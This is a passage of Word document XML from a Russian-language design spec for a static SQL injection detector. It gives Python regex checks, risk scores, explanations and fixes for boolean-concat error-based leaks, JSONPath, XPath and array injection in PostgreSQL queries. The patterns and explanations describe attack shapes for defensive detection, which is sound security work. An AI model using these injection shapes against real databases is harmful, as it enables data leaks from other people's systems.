        <w:t xml:space="preserve">    r"\bANY\s*\(\s*ARRAY\s*\[[^\]]*\$\{|"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54687168" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # containment с array-literal от user-input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D37CEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"['\"]\{[^}]*\}['\"]\s*::(?:int|text|bigint|uuid)\[\]\s*(?:@&gt;|&lt;@|&amp;&amp;)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6C30EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D7047" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E92385" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0462FC"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065623D5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["type_inj_boolean_concat"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A96464"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4A7D2B24"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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECE39D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E4C837" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="Конкатенация user-input в bool-сравнение (WHERE bool_col "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E1B914" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "= '...' || (SELECT ...)) — паттерн error-based leak через "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585F89B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "invalid boolean syntax. См. 3.11.1.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EF898" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Параметризуйте сравнение: WHERE bool_col = $1 с bind "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B3D875" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "value. Не конкатенируйте subquery в bool-context.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83B015" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06FC94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1014A9A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["type_inj_jsonb_path"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BC8D0A"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737B5C4C"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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E90BB21" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7167D400" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="JSON-path или JSONPath operator с runtime-конкатенацией "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CFD3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "или подозрительными DSL-конструкциями (like_regex, .**, "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CBBCBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "?(...)) — паттерн arbitrary key extraction или JSONPath "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5814859C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "injection. См. 3.11.2.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2656A18B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="JSON-path должен быть фиксированным template или bind "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64800C3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "variable. Whitelist разрешённых path-литералов на "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F626996" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "application-уровне.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7968C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B54021" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A27C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["type_inj_xpath"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7484C572"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2497A38C"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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869F285" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4389CF27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="xpath() / xpath_exists() / xmltable с runtime-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCE828" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "вычисленным XPath или с recursive-spuskom (//, /text(), "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC309F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "starts-with, contains в payload-выражении) — паттерн "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6234D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "XPath injection. См. 3.11.3.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48926D3B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="XPath должен быть фиксированным template, переданным "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347548C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "как bind variable. Whitelist разрешённых XPath-выражений.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1275B3B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487B4605" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3A1AEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if _RE["type_inj_array"].search(sql):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C274878"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2A13E5AF"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vulnerability_class=VulnerabilityClass.TYPE_INJECTION,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F25FE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        risk_score=7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55415CAF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        explanation="string_to_array с concat, ANY(ARRAY[]) с user-input в "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D967E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "элементах, или containment-оператор (@&gt;/&lt;@/&amp;&amp;) с "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD32F5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "user-controlled array literal — паттерн array injection. "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC3F6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "См. 3.11.4.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA0720" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        suggested_fix="Передавайте array через typed bind value драйвера "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E017E4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "(psycopg/asyncpg list→ARRAY автоматический). Не "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24014153" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      "конкатенируйте array literal вручную.",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F33C92B"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60B9636A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Градация risk обоснована:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4327CFD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type_inj_boolean_concat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>. Concat в bool-context + subquery — почти всегда leak attempt; легитимные сценарии редки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695C7DDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type_inj_jsonb_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>. JSONPath DSL-операторы (like_regex, **) в runtime-генерируемом SQL — почти всегда атака; легитимно эти конструкции в фиксированных queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C554135" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>type_inj_xpath</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. XPath с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> recursive descent или XPath-функциями — recon/leak-сигнатура; легитимные XPath обычно конкретные paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB35165" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
